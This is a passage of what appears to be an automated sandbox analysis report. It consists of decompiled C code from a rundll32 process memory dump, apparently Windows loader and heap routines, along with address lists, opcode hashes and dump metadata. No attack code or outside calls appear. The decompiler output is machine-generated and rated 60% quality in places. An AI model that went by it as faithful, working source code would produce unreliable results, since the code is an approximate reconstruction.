                                                                                                                																L143:
                                                                                                                																_v8 = 0xfffffffe;
                                                                                                                																_t211 = 0xc0000089;
                                                                                                                															} else {
                                                                                                                																_v36 = 0;
                                                                                                                																_v60 = 0;
                                                                                                                																_v48 = 0;
                                                                                                                																_v68 = 0;
                                                                                                                																_v44 = _t290 & 0xfffffffc;
                                                                                                                																E0441E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                                                                                																_t306 = _v68;
                                                                                                                																__eflags = _t306;
                                                                                                                																if(_t306 == 0) {
                                                                                                                																	_t216 = 0xc000007b;
                                                                                                                																	_v36 = 0xc000007b;
                                                                                                                																	_t307 = _v60;
                                                                                                                																} else {
                                                                                                                																	__eflags = _t290 & 0x00000001;
                                                                                                                																	if(__eflags == 0) {
                                                                                                                																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                                                                                																		__eflags = _t349 - 0x10b;
                                                                                                                																		if(_t349 != 0x10b) {
                                                                                                                																			__eflags = _t349 - 0x20b;
                                                                                                                																			if(_t349 == 0x20b) {
                                                                                                                																				goto L102;
                                                                                                                																			} else {
                                                                                                                																				_t307 = 0;
                                                                                                                																				_v48 = 0;
                                                                                                                																				_t216 = 0xc000007b;
                                                                                                                																				_v36 = 0xc000007b;
                                                                                                                																				goto L71;
                                                                                                                																			}
                                                                                                                																		} else {
                                                                                                                																			L102:
                                                                                                                																			_t307 =  *(_t306 + 0x50);
                                                                                                                																			goto L69;
                                                                                                                																		}
                                                                                                                																		goto L151;
                                                                                                                																	} else {
                                                                                                                																		_t239 = L0441EAEA(_t290, _t290, _t356, _t366, __eflags);
                                                                                                                																		_t307 = _t239;
                                                                                                                																		_v60 = _t307;
                                                                                                                																		_v48 = _t307;
                                                                                                                																		__eflags = _t307;
                                                                                                                																		if(_t307 != 0) {
                                                                                                                																			L70:
                                                                                                                																			_t216 = _v36;
                                                                                                                																		} else {
                                                                                                                																			_push(_t239);
                                                                                                                																			_push(0x14);
                                                                                                                																			_push( &_v144);
                                                                                                                																			_push(3);
                                                                                                                																			_push(_v44);
                                                                                                                																			_push(0xffffffff);
                                                                                                                																			_t319 = E04449730();
                                                                                                                																			_v36 = _t319;
                                                                                                                																			__eflags = _t319;
                                                                                                                																			if(_t319 < 0) {
                                                                                                                																				_t216 = 0xc000001f;
                                                                                                                																				_v36 = 0xc000001f;
                                                                                                                																				_t307 = _v60;
                                                                                                                																			} else {
                                                                                                                																				_t307 = _v132;
                                                                                                                																				L69:
                                                                                                                																				_v48 = _t307;
                                                                                                                																				goto L70;
                                                                                                                																			}
                                                                                                                																		}
                                                                                                                																	}
                                                                                                                																}
                                                                                                                																L71:
                                                                                                                																_v72 = _t307;
                                                                                                                																_v84 = _t216;
                                                                                                                																__eflags = _t216 - 0xc000007b;
                                                                                                                																if(_t216 == 0xc000007b) {
                                                                                                                																	L150:
                                                                                                                																	_v8 = 0xfffffffe;
                                                                                                                																	_t211 = 0xc000007b;
                                                                                                                																} else {
                                                                                                                																	_t344 = _t290 & 0xfffffffc;
                                                                                                                																	_v76 = _t344;
                                                                                                                																	__eflags = _v40 - _t344;
                                                                                                                																	if(_v40 <= _t344) {
                                                                                                                																		goto L150;
                                                                                                                																	} else {
                                                                                                                																		__eflags = _t307;
                                                                                                                																		if(_t307 == 0) {
                                                                                                                																			L75:
                                                                                                                																			_t217 = 0;
                                                                                                                																			_v104 = 0;
                                                                                                                																			__eflags = _t366;
                                                                                                                																			if(_t366 != 0) {
                                                                                                                																				__eflags = _t290 & 0x00000001;
                                                                                                                																				if((_t290 & 0x00000001) != 0) {
                                                                                                                																					_t217 = 1;
                                                                                                                																					_v104 = 1;
                                                                                                                																				}
                                                                                                                																				_t290 = _v44;
                                                                                                                																				_v52 = _t290;
                                                                                                                																			}
                                                                                                                																			__eflags = _t217 - 1;
                                                                                                                																			if(_t217 != 1) {
                                                                                                                																				_t369 = 0;
                                                                                                                																				_t218 = _v40;
                                                                                                                																				goto L91;
                                                                                                                																			} else {
                                                                                                                																				_v64 = 0;
                                                                                                                																				E0441E9C0(1, _t290, 0, 0,  &_v64);
                                                                                                                																				_t309 = _v64;
                                                                                                                																				_v108 = _t309;
                                                                                                                																				__eflags = _t309;
                                                                                                                																				if(_t309 == 0) {
                                                                                                                																					goto L143;
                                                                                                                																				} else {
                                                                                                                																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                                                                                																					__eflags = _t226 - 0x10b;
                                                                                                                																					if(_t226 != 0x10b) {
                                                                                                                																						__eflags = _t226 - 0x20b;
                                                                                                                																						if(_t226 != 0x20b) {
                                                                                                                																							goto L143;
                                                                                                                																						} else {
                                                                                                                																							_t371 =  *(_t309 + 0x98);
                                                                                                                																							goto L83;
                                                                                                                																						}
                                                                                                                																					} else {
                                                                                                                																						_t371 =  *(_t309 + 0x88);
                                                                                                                																						L83:
                                                                                                                																						__eflags = _t371;
                                                                                                                																						if(_t371 != 0) {
                                                                                                                																							_v80 = _t371 - _t356 + _t290;
                                                                                                                																							_t310 = _v64;
                                                                                                                																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                                                                                																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                                                                                																							_t311 = 0;
                                                                                                                																							__eflags = 0;
                                                                                                                																							while(1) {
                                                                                                                																								_v120 = _t311;
                                                                                                                																								_v116 = _t348;
                                                                                                                																								__eflags = _t311 - _t292;
                                                                                                                																								if(_t311 >= _t292) {
                                                                                                                																									goto L143;
                                                                                                                																								}
                                                                                                                																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                                                                                																								__eflags = _t371 - _t359;
                                                                                                                																								if(_t371 < _t359) {
                                                                                                                																									L98:
                                                                                                                																									_t348 = _t348 + 0x28;
                                                                                                                																									_t311 = _t311 + 1;
                                                                                                                																									continue;
                                                                                                                																								} else {
                                                                                                                																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                                                                                																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                                                                                																										goto L98;
                                                                                                                																									} else {
                                                                                                                																										__eflags = _t348;
                                                                                                                																										if(_t348 == 0) {
                                                                                                                																											goto L143;
                                                                                                                																										} else {
                                                                                                                																											_t218 = _v40;
                                                                                                                																											_t312 =  *_t218;
                                                                                                                																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                                                                                																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                                                                                																												_v100 = _t359;
                                                                                                                																												_t360 = _v108;
                                                                                                                																												_t372 = L04418F44(_v108, _t312);
                                                                                                                																												__eflags = _t372;
                                                                                                                																												if(_t372 == 0) {
                                                                                                                																													goto L143;
                                                                                                                																												} else {
                                                                                                                																													_t290 = _v52;
                                                                                                                																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04443C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                                                                                																													_t307 = _v72;
                                                                                                                																													_t344 = _v76;
                                                                                                                																													_t218 = _v40;
                                                                                                                																													goto L91;
                                                                                                                																												}
                                                                                                                																											} else {
                                                                                                                																												_t290 = _v52;
                                                                                                                																												_t307 = _v72;
                                                                                                                																												_t344 = _v76;
                                                                                                                																												_t369 = _v80;
                                                                                                                																												L91:
                                                                                                                																												_t358 = _a4;
                                                                                                                																												__eflags = _t358;
                                                                                                                																												if(_t358 == 0) {
                                                                                                                																													L95:
                                                                                                                																													_t308 = _a8;
                                                                                                                																													__eflags = _t308;
                                                                                                                																													if(_t308 != 0) {
                                                                                                                																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                                                                                																													}
                                                                                                                																													_v8 = 0xfffffffe;
                                                                                                                																													_t211 = _v84;
                                                                                                                																												} else {
                                                                                                                																													_t370 =  *_t218 - _t369 + _t290;
                                                                                                                																													 *_t358 = _t370;
                                                                                                                																													__eflags = _t370 - _t344;
                                                                                                                																													if(_t370 <= _t344) {
                                                                                                                																														L149:
                                                                                                                																														 *_t358 = 0;
                                                                                                                																														goto L150;
                                                                                                                																													} else {
                                                                                                                																														__eflags = _t307;
                                                                                                                																														if(_t307 == 0) {
                                                                                                                																															goto L95;
                                                                                                                																														} else {
                                                                                                                																															__eflags = _t370 - _t344 + _t307;
                                                                                                                																															if(_t370 >= _t344 + _t307) {
                                                                                                                																																goto L149;
                                                                                                                																															} else {
                                                                                                                																																goto L95;
                                                                                                                																															}
                                                                                                                																														}
                                                                                                                																													}
                                                                                                                																												}
                                                                                                                																											}
                                                                                                                																										}
                                                                                                                																									}
                                                                                                                																								}
                                                                                                                																								goto L97;
                                                                                                                																							}
                                                                                                                																						}
                                                                                                                																						goto L143;
                                                                                                                																					}
                                                                                                                																				}
                                                                                                                																			}
                                                                                                                																		} else {
                                                                                                                																			__eflags = _v40 - _t307 + _t344;
                                                                                                                																			if(_v40 >= _t307 + _t344) {
                                                                                                                																				goto L150;
                                                                                                                																			} else {
                                                                                                                																				goto L75;
                                                                                                                																			}
                                                                                                                																		}
                                                                                                                																	}
                                                                                                                																}
                                                                                                                															}
                                                                                                                															L97:
                                                                                                                															 *[fs:0x0] = _v20;
                                                                                                                															return _t211;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											goto L46;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                								goto L151;
                                                                                                                							}
                                                                                                                							_t288 = _v164;
                                                                                                                							_t366 = 0xc0000135;
                                                                                                                							goto L41;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L151:
                                                                                                                			}

                                                                                                                0x0446b375
                                                                                                                0x00000000
                                                                                                                0x0446b375
                                                                                                                0x00000000
                                                                                                                0x0441d6cc
                                                                                                                0x0441d6d8
                                                                                                                0x0441d6d8
                                                                                                                0x0441d6d8
                                                                                                                0x00000000
                                                                                                                0x0441d6c6
                                                                                                                0x0441d6bf
                                                                                                                0x00000000
                                                                                                                0x0441d6da
                                                                                                                0x0441d6da
                                                                                                                0x0441d716
                                                                                                                0x0441d71b
                                                                                                                0x0441d720
                                                                                                                0x0441d726
                                                                                                                0x0441d726
                                                                                                                0x0441d72d
                                                                                                                0x00000000
                                                                                                                0x0441d733
                                                                                                                0x0441d739
                                                                                                                0x0441d742
                                                                                                                0x0441d750
                                                                                                                0x0441d758
                                                                                                                0x0441d764
                                                                                                                0x0441d776
                                                                                                                0x0441d77a
                                                                                                                0x0441d783
                                                                                                                0x0441d928
                                                                                                                0x0441d92c
                                                                                                                0x0441d93d
                                                                                                                0x0441d944
                                                                                                                0x0441d94f
                                                                                                                0x0441d954
                                                                                                                0x0441d956
                                                                                                                0x0441d95f
                                                                                                                0x0441d961
                                                                                                                0x0441d973
                                                                                                                0x0441d973
                                                                                                                0x0441d956
                                                                                                                0x0441d944
                                                                                                                0x0441d92c
                                                                                                                0x0441d78b
                                                                                                                0x0446b394
                                                                                                                0x0441d791
                                                                                                                0x0441d798
                                                                                                                0x0446b3a3
                                                                                                                0x0446b3bb
                                                                                                                0x0446b3bb
                                                                                                                0x0441d7a5
                                                                                                                0x0441d866
                                                                                                                0x0441d870
                                                                                                                0x0441d884
                                                                                                                0x0441d892
                                                                                                                0x0441d898
                                                                                                                0x0441d89e
                                                                                                                0x0441d8a0
                                                                                                                0x0441d8a6
                                                                                                                0x0441d8ac
                                                                                                                0x0441d8ae
                                                                                                                0x0441d8b4
                                                                                                                0x0441d8b4
                                                                                                                0x0441d8ae
                                                                                                                0x0441d7a5
                                                                                                                0x0441d78b
                                                                                                                0x0441d7b1
                                                                                                                0x0446b3c5
                                                                                                                0x0446b3c5
                                                                                                                0x0441d7c3
                                                                                                                0x0441d7ca
                                                                                                                0x0441d7e5
                                                                                                                0x0441d7eb
                                                                                                                0x0441d8eb
                                                                                                                0x0441d8ed
                                                                                                                0x00000000
                                                                                                                0x0441d8f3
                                                                                                                0x0441d8f3
                                                                                                                0x0441d8f3
                                                                                                                0x00000000
                                                                                                                0x0441d8ed
                                                                                                                0x0441d7cc
                                                                                                                0x0441d7cc
                                                                                                                0x0441d7d2
                                                                                                                0x00000000
                                                                                                                0x0441d7d4
                                                                                                                0x0441d7d4
                                                                                                                0x0441d7d7
                                                                                                                0x0441d7df
                                                                                                                0x0446b3d4
                                                                                                                0x0446b3d9
                                                                                                                0x0446b3dc
                                                                                                                0x0446b3dc
                                                                                                                0x0446b3df
                                                                                                                0x0446b3e2
                                                                                                                0x0446b468
                                                                                                                0x0446b46d
                                                                                                                0x0446b46f
                                                                                                                0x0446b46f
                                                                                                                0x0446b475
                                                                                                                0x0441d8f8
                                                                                                                0x0441d8f9
                                                                                                                0x0441d8fd
                                                                                                                0x0446b3e8
                                                                                                                0x0446b3e8
                                                                                                                0x0446b3eb
                                                                                                                0x0446b3ed
                                                                                                                0x00000000
                                                                                                                0x0446b3ef
                                                                                                                0x0446b3ef
                                                                                                                0x0446b3f1
                                                                                                                0x0446b3f4
                                                                                                                0x0446b3fe
                                                                                                                0x0446b404
                                                                                                                0x0446b409
                                                                                                                0x0446b40e
                                                                                                                0x0446b410
                                                                                                                0x0446b410
                                                                                                                0x0446b414
                                                                                                                0x0446b414
                                                                                                                0x0446b41b
                                                                                                                0x0446b420
                                                                                                                0x0446b423
                                                                                                                0x0446b425
                                                                                                                0x0446b427
                                                                                                                0x0446b42a
                                                                                                                0x0446b42d
                                                                                                                0x0446b42d
                                                                                                                0x0446b42a
                                                                                                                0x0446b432
                                                                                                                0x0446b436
                                                                                                                0x0446b438
                                                                                                                0x0446b43b
                                                                                                                0x0446b43b
                                                                                                                0x0446b449
                                                                                                                0x0446b44e
                                                                                                                0x0446b454
                                                                                                                0x0446b458
                                                                                                                0x0446b458
                                                                                                                0x0446b45d
                                                                                                                0x00000000
                                                                                                                0x0446b45d
                                                                                                                0x0446b3ed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441d7df
                                                                                                                0x0441d7d2
                                                                                                                0x0441d7ca
                                                                                                                0x0446b37c
                                                                                                                0x0446b37e
                                                                                                                0x0446b385
                                                                                                                0x0446b38a
                                                                                                                0x00000000
                                                                                                                0x0446b38a
                                                                                                                0x0441d742
                                                                                                                0x0441d7f1
                                                                                                                0x0441d7f8
                                                                                                                0x0446b49b
                                                                                                                0x0446b49b
                                                                                                                0x0441d800
                                                                                                                0x0441d837
                                                                                                                0x0441d843
                                                                                                                0x0441d845
                                                                                                                0x0441d847
                                                                                                                0x0441d84a
                                                                                                                0x0441d84b
                                                                                                                0x0441d84e
                                                                                                                0x0441d857
                                                                                                                0x0441d802
                                                                                                                0x0441d802
                                                                                                                0x0441d80d
                                                                                                                0x00000000
                                                                                                                0x0441d818
                                                                                                                0x0441d818
                                                                                                                0x0441d824
                                                                                                                0x0441d831
                                                                                                                0x0446b4a5
                                                                                                                0x0446b4ab
                                                                                                                0x0446b4b3
                                                                                                                0x0446b4b8
                                                                                                                0x0446b4bb
                                                                                                                0x00000000
                                                                                                                0x0446b4c1
                                                                                                                0x0446b4c1
                                                                                                                0x0446b4c8
                                                                                                                0x00000000
                                                                                                                0x0446b4ce
                                                                                                                0x0446b4d4
                                                                                                                0x0446b4e1
                                                                                                                0x0446b4e3
                                                                                                                0x0446b4e5
                                                                                                                0x00000000
                                                                                                                0x0446b4eb
                                                                                                                0x0446b4f0
                                                                                                                0x0446b4f2
                                                                                                                0x0441dac9
                                                                                                                0x0441dacc
                                                                                                                0x0441dacf
                                                                                                                0x0441dad1
                                                                                                                0x0441dd78
                                                                                                                0x0441dd78
                                                                                                                0x0441dcf2
                                                                                                                0x00000000
                                                                                                                0x0441dad7
                                                                                                                0x0441dad9
                                                                                                                0x0441dadb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441dae1
                                                                                                                0x0441dae1
                                                                                                                0x0441dae4
                                                                                                                0x0441dae6
                                                                                                                0x0446b4f9
                                                                                                                0x0446b4f9
                                                                                                                0x0446b500
                                                                                                                0x0441daec
                                                                                                                0x0441daec
                                                                                                                0x0441daf5
                                                                                                                0x0441daf8
                                                                                                                0x0441dafb
                                                                                                                0x0441db03
                                                                                                                0x0441db11
                                                                                                                0x0441db16
                                                                                                                0x0441db19
                                                                                                                0x0441db1b

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: X\5$)5
                                                                                                                • API String ID: 0-2072700117
                                                                                                                • Opcode ID: 204124c06d5f650e940c204727c2471aadec9d5ba845e4a84aba39b04ce1ac32
                                                                                                                • Instruction ID: 4c2cddb300283cf336efc1f79c3e68a649fe14384aa150844010543f9fb258a9
                                                                                                                • Opcode Fuzzy Hash: 204124c06d5f650e940c204727c2471aadec9d5ba845e4a84aba39b04ce1ac32
                                                                                                                • Instruction Fuzzy Hash: 99E1AFB0B006658FEF34DF19C944B6AB7B1EF45308F0501ABD9199B3A1EB74B981CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 60%
                                                                                                                			E044CE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                                                                				signed int _v20;
                                                                                                                				char _v24;
                                                                                                                				signed int _v40;
                                                                                                                				char _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				signed int _v52;
                                                                                                                				unsigned int _v56;
                                                                                                                				char _v60;
                                                                                                                				signed int _v64;
                                                                                                                				char _v68;
                                                                                                                				signed int _v72;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				char _t87;
                                                                                                                				signed int _t90;
                                                                                                                				signed int _t94;
                                                                                                                				signed int _t100;
                                                                                                                				intOrPtr* _t113;
                                                                                                                				signed int _t122;
                                                                                                                				void* _t132;
                                                                                                                				void* _t135;
                                                                                                                				signed int _t139;
                                                                                                                				signed int* _t141;
                                                                                                                				signed int _t146;
                                                                                                                				signed int _t147;
                                                                                                                				void* _t153;
                                                                                                                				signed int _t155;
                                                                                                                				signed int _t159;
                                                                                                                				char _t166;
                                                                                                                				void* _t172;
                                                                                                                				void* _t176;
                                                                                                                				signed int _t177;
                                                                                                                				intOrPtr* _t179;
                                                                                                                
                                                                                                                				_t179 = __ecx;
                                                                                                                				_v48 = __edx;
                                                                                                                				_v68 = 0;
                                                                                                                				_v72 = 0;
                                                                                                                				_push(__ecx[1]);
                                                                                                                				_push( *__ecx);
                                                                                                                				_push(0);
                                                                                                                				_t153 = 0x14;
                                                                                                                				_t135 = _t153;
                                                                                                                				_t132 = E044CBBBB(_t135, _t153);
                                                                                                                				if(_t132 == 0) {
                                                                                                                					_t166 = _v68;
                                                                                                                					goto L43;
                                                                                                                				} else {
                                                                                                                					_t155 = 0;
                                                                                                                					_v52 = 0;
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					_v56 = __ecx[1];
                                                                                                                					if( *__ecx >> 8 < 2) {
                                                                                                                						_t155 = 1;
                                                                                                                						_v52 = 1;
                                                                                                                					}
                                                                                                                					_t139 = _a4;
                                                                                                                					_t87 = (_t155 << 0xc) + _t139;
                                                                                                                					_v60 = _t87;
                                                                                                                					if(_t87 < _t139) {
                                                                                                                						L11:
                                                                                                                						_t166 = _v68;
                                                                                                                						L12:
                                                                                                                						if(_t132 != 0) {
                                                                                                                							E044CBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                                                                						}
                                                                                                                						L43:
                                                                                                                						if(_v72 != 0) {
                                                                                                                							_push( *((intOrPtr*)(_t179 + 4)));
                                                                                                                							_push( *_t179);
                                                                                                                							_push(0x8000);
                                                                                                                							E044CAFDE( &_v72,  &_v60);
                                                                                                                						}
                                                                                                                						L46:
                                                                                                                						return _t166;
                                                                                                                					}
                                                                                                                					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                                                                					asm("sbb edi, edi");
                                                                                                                					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                                                                					if(_t90 != 0) {
                                                                                                                						_push(0);
                                                                                                                						_push(0x14);
                                                                                                                						_push( &_v44);
                                                                                                                						_push(3);
                                                                                                                						_push(_t179);
                                                                                                                						_push(0xffffffff);
                                                                                                                						if(E04449730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                                                                							_push(_t139);
                                                                                                                							E044CA80D(_t179, 1, _v40, 0);
                                                                                                                							_t172 = 4;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t141 =  &_v72;
                                                                                                                					if(E044CA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                                                                						_v64 = _a4;
                                                                                                                						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                                                                						asm("sbb edi, edi");
                                                                                                                						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                                                                						if(_t94 != 0) {
                                                                                                                							_push(0);
                                                                                                                							_push(0x14);
                                                                                                                							_push( &_v24);
                                                                                                                							_push(3);
                                                                                                                							_push(_t179);
                                                                                                                							_push(0xffffffff);
                                                                                                                							if(E04449730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                                                                								_push(_t141);
                                                                                                                								E044CA80D(_t179, 1, _v20, 0);
                                                                                                                								_t176 = 4;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(E044CA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                                                                							goto L11;
                                                                                                                						} else {
                                                                                                                							_t177 = _v64;
                                                                                                                							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                                                                							_t100 = _v52 + _v52;
                                                                                                                							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                                                                							 *(_t132 + 0x10) = _t146;
                                                                                                                							asm("bsf eax, [esp+0x18]");
                                                                                                                							_v52 = _t100;
                                                                                                                							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                                                                							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                                                                							_t47 =  &_a8;
                                                                                                                							 *_t47 = _a8 & 0x00000001;
                                                                                                                							if( *_t47 == 0) {
                                                                                                                								E04422280(_t179 + 0x30, _t179 + 0x30);
                                                                                                                							}
                                                                                                                							_t147 =  *(_t179 + 0x34);
                                                                                                                							_t159 =  *(_t179 + 0x38) & 1;
                                                                                                                							_v68 = 0;
                                                                                                                							if(_t147 == 0) {
                                                                                                                								L35:
                                                                                                                								E0441B090(_t179 + 0x34, _t147, _v68, _t132);
                                                                                                                								if(_a8 == 0) {
                                                                                                                									E0441FFB0(_t132, _t177, _t179 + 0x30);
                                                                                                                								}
                                                                                                                								asm("lock xadd [eax], ecx");
                                                                                                                								asm("lock xadd [eax], edx");
                                                                                                                								_t132 = 0;
                                                                                                                								_v72 = _v72 & 0;
                                                                                                                								_v68 = _v72;
                                                                                                                								if(E04427D50() == 0) {
                                                                                                                									_t113 = 0x7ffe0388;
                                                                                                                								} else {
                                                                                                                									_t177 = _v64;
                                                                                                                									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                								}
                                                                                                                								if( *_t113 == _t132) {
                                                                                                                									_t166 = _v68;
                                                                                                                									goto L46;
                                                                                                                								} else {
                                                                                                                									_t166 = _v68;
                                                                                                                									E044BFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                                                                									goto L12;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								L23:
                                                                                                                								while(1) {
                                                                                                                									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                                                                										_t122 =  *_t147;
                                                                                                                										if(_t159 == 0) {
                                                                                                                											L32:
                                                                                                                											if(_t122 == 0) {
                                                                                                                												L34:
                                                                                                                												_v68 = 0;
                                                                                                                												goto L35;
                                                                                                                											}
                                                                                                                											L33:
                                                                                                                											_t147 = _t122;
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                										if(_t122 == 0) {
                                                                                                                											goto L34;
                                                                                                                										}
                                                                                                                										_t122 = _t122 ^ _t147;
                                                                                                                										goto L32;
                                                                                                                									}
                                                                                                                									_t122 =  *(_t147 + 4);
                                                                                                                									if(_t159 == 0) {
                                                                                                                										L27:
                                                                                                                										if(_t122 != 0) {
                                                                                                                											goto L33;
                                                                                                                										}
                                                                                                                										L28:
                                                                                                                										_v68 = 1;
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									if(_t122 == 0) {
                                                                                                                										goto L28;
                                                                                                                									}
                                                                                                                									_t122 = _t122 ^ _t147;
                                                                                                                									goto L27;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_v72 = _v72 & 0x00000000;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}




































                                                                                                                0x044ce5f1
                                                                                                                0x044ce5f8
                                                                                                                0x044ce5f8
                                                                                                                0x044ce5d5
                                                                                                                0x044ce602
                                                                                                                0x044ce616
                                                                                                                0x044ce63d
                                                                                                                0x044ce644
                                                                                                                0x044ce64d
                                                                                                                0x044ce652
                                                                                                                0x044ce657
                                                                                                                0x044ce659
                                                                                                                0x044ce65b
                                                                                                                0x044ce661
                                                                                                                0x044ce662
                                                                                                                0x044ce664
                                                                                                                0x044ce665
                                                                                                                0x044ce66e
                                                                                                                0x044ce67d
                                                                                                                0x044ce68a
                                                                                                                0x044ce691
                                                                                                                0x044ce691
                                                                                                                0x044ce66e
                                                                                                                0x044ce6b0
                                                                                                                0x00000000
                                                                                                                0x044ce6b6
                                                                                                                0x044ce6bd
                                                                                                                0x044ce6c7
                                                                                                                0x044ce6d7
                                                                                                                0x044ce6d9
                                                                                                                0x044ce6db
                                                                                                                0x044ce6de
                                                                                                                0x044ce6e3
                                                                                                                0x044ce6f3
                                                                                                                0x044ce6fc
                                                                                                                0x044ce700
                                                                                                                0x044ce700
                                                                                                                0x044ce704
                                                                                                                0x044ce70a
                                                                                                                0x044ce70a
                                                                                                                0x044ce713
                                                                                                                0x044ce716
                                                                                                                0x044ce719
                                                                                                                0x044ce720
                                                                                                                0x044ce761
                                                                                                                0x044ce76b
                                                                                                                0x044ce774
                                                                                                                0x044ce77a
                                                                                                                0x044ce77a
                                                                                                                0x044ce78a
                                                                                                                0x044ce791
                                                                                                                0x044ce799
                                                                                                                0x044ce79b
                                                                                                                0x044ce79f
                                                                                                                0x044ce7aa
                                                                                                                0x044ce7c0
                                                                                                                0x044ce7ac
                                                                                                                0x044ce7b2
                                                                                                                0x044ce7b9
                                                                                                                0x044ce7b9
                                                                                                                0x044ce7c7
                                                                                                                0x044ce806
                                                                                                                0x00000000
                                                                                                                0x044ce7c9
                                                                                                                0x044ce7d1
                                                                                                                0x044ce7d8
                                                                                                                0x00000000
                                                                                                                0x044ce7d8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044ce722
                                                                                                                0x044ce72e
                                                                                                                0x044ce748
                                                                                                                0x044ce74c
                                                                                                                0x044ce754
                                                                                                                0x044ce756
                                                                                                                0x044ce75c
                                                                                                                0x044ce75c
                                                                                                                0x00000000
                                                                                                                0x044ce75c
                                                                                                                0x044ce758
                                                                                                                0x044ce758
                                                                                                                0x00000000
                                                                                                                0x044ce758
                                                                                                                0x044ce750
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044ce752
                                                                                                                0x00000000
                                                                                                                0x044ce752
                                                                                                                0x044ce730
                                                                                                                0x044ce735
                                                                                                                0x044ce73d
                                                                                                                0x044ce73f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044ce741
                                                                                                                0x044ce741
                                                                                                                0x00000000
                                                                                                                0x044ce741
                                                                                                                0x044ce739
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044ce73b
                                                                                                                0x00000000
                                                                                                                0x044ce73b
                                                                                                                0x044ce722
                                                                                                                0x044ce720
                                                                                                                0x044ce6b0
                                                                                                                0x044ce618
                                                                                                                0x00000000
                                                                                                                0x044ce618

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `$`
                                                                                                                • API String ID: 0-197956300
                                                                                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                • Instruction ID: d4749151868d53a32a8249afb7df256cb30edf29ac658ddb9983d3a0c503d1cd
